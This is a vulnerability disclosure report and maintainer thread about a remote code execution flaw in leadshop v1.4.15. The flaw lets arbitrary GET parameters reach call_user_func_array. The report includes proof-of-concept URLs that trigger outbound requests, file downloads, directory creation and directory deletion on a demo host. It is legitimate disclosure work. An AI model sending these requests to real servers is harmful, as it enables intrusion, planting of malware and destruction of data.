There is an RCE vulnerability in qmpaas/leadshop

Valid

Reported on

Nov 7th 2022


Description

There is an RCE vulnerability in qmpaas/leadshop (https://github.com/qmpaas/leadshop) (v1.4.15). An attacker can access the file leadshop.php and call any existing function through GET to control the target host.
The vulnerability is in the leadshop/web/leadshop.php[27-61] file

    public function run()
    {
        //读取参数数据
        $include = isset($_GET['include']) ? $_GET['include'] : "";
        $data    = isset($_GET['data']) ? $_GET['data'] : "";
        $meta    = isset($_GET['meta']) ? $_GET['meta'] : "";
        //执行数据方法
        if ($include) {
            return call_user_func_array([$this, $include], [$meta, $data]);
        } else {
            //用于判断是否非法操作
            $token = isset($_GET['token']) ? $_GET['token'] : "";
            $html  = get_oss_url('index.html');
            //判断锁文件是否存在,存在则是要执行更新
            if (@file_exists(dirname(__DIR__) . "/install.lock")) {
                if (@file_get_contents(dirname(__DIR__) . "/install.lock") === $token) {
                    if (!isset($_SESSION['self_update'])) {
                        //执行更新自身
                        $this->SilentSelfUpdate();
                    }
                    //执行更新操作
                    $version = get_version();
                    $body    = $this->DownloadFile($html);
                    echo str_replace('{$version}', $version, $body);
                } else {
                    die("检测到非法Token,请登录后台进入更新界面");
                }
            } else {
                $version = get_version();
                $body    = $this->DownloadFile($html);
                echo str_replace('{$version}', $version, $body);
            }
        }

    }

The call_user_func_array function is used directly, and $include, $data, and $meta receive get parameters, which allows us to run all functions in this file (parameters less than or equal to 2), such as:
HttpGet (http access: poc: https://demo.leadshop.vip/leadshop.php?include=HttpGet&meta=6nup69.dnslog.cn),
ToMkdir (create folder: poc: https://demo.leadshop.vip/leadshop.php?include=ToMkdir&meta=1),
UpdateSql (perform database update: poc: https://demo.leadshop.vip/leadshop.php?include=UpdateSql),
DownloadFile (download file: poc: https://demo.leadshop.vip/leadshop.php?include=DownloadFile&meta=www.baidu.com/img/flexible/logo/pc/peak-result.png)
RemoveDir (remove directory: poc: https://demo.leadshop.vip/leadshop.php?include=RemoveDir&meta=[path])

Proof of Concept:

Poc:

https://demo.leadshop.vip/leadshop.php?include=HttpGet&meta=6nup69.dnslog.cn  

DNSLOG picture:
img

Impact

Attackers can call any existing functions at will, control the target server to access, download, create files, delete files, etc.
Access may make the server a dos server.
Download, so that an attacker can download the PHP Trojan to the server.
Creating and deleting will destroy normal services.
More than ten IPs are using this service.

We are processing your report and will contact the qmpaas/leadshop team within 24 hours. 22 days ago
ouroborosscr modified the report
22 days ago
ouroborosscr modified the report
22 days ago
ouroborosscr modified the report
22 days ago
ouroborosscr modified the report
21 days ago
ouroborosscr
21 days ago

Researcher


Hi,@admin.Thanks.Could you please contact maintainer?

We have contacted a member of the qmpaas/leadshop team and are waiting to hear back 21 days ago
ouroborosscr
21 days ago

Researcher


Hi,@admin Can I contact maintainer to agree to assign a CVE?Thanks.

ouroborosscr modified the report
21 days ago
ouroborosscr modified the report
21 days ago
ouroborosscr modified the report
21 days ago
Pavlos
19 days ago

Admin


Hey👋 Before a CVE can be assigned the maintainer first has to validate your report and fix the vulnerability. At that point they will be asked if they want to assign a CVE just before they go public with the disclosure.

leadshop开源商城
14 days ago

Maintainer


Great work @ouroborosscr 👌 Could you kindly propose/submit a fix for this vulnerability? Any help is appreciated.

leadshop开源商城 validated this vulnerability 14 days ago
ouroborosscr has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
ouroborosscr submitted a
5 days ago
leadshop开源商城 gave praise 5 days ago
thinks
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
leadshop开源商城 marked this as fixed in 1.4.16 with commit f27e9c 5 days ago
ouroborosscr has been awarded the fix bounty
This vulnerability has been assigned a CVE
ouroborosscr
5 days ago

Researcher


@admin can we assign a CVE here?

ouroborosscr
5 days ago

Researcher


@admin I contact maintainer to agree to assign a CVE. He said"I did it. See if it's right?" "The first time I used this platform." The first time I used this platform. Thanks.

ouroborosscr
5 days ago

Researcher


@admin I contact maintainer to agree to assign a CVE. He said"I did it. See if it's right?" "The first time I used this platform." Please help us finish the work. Thanks.

leadshop开源商城 published this vulnerability 5 days ago
to join this conversation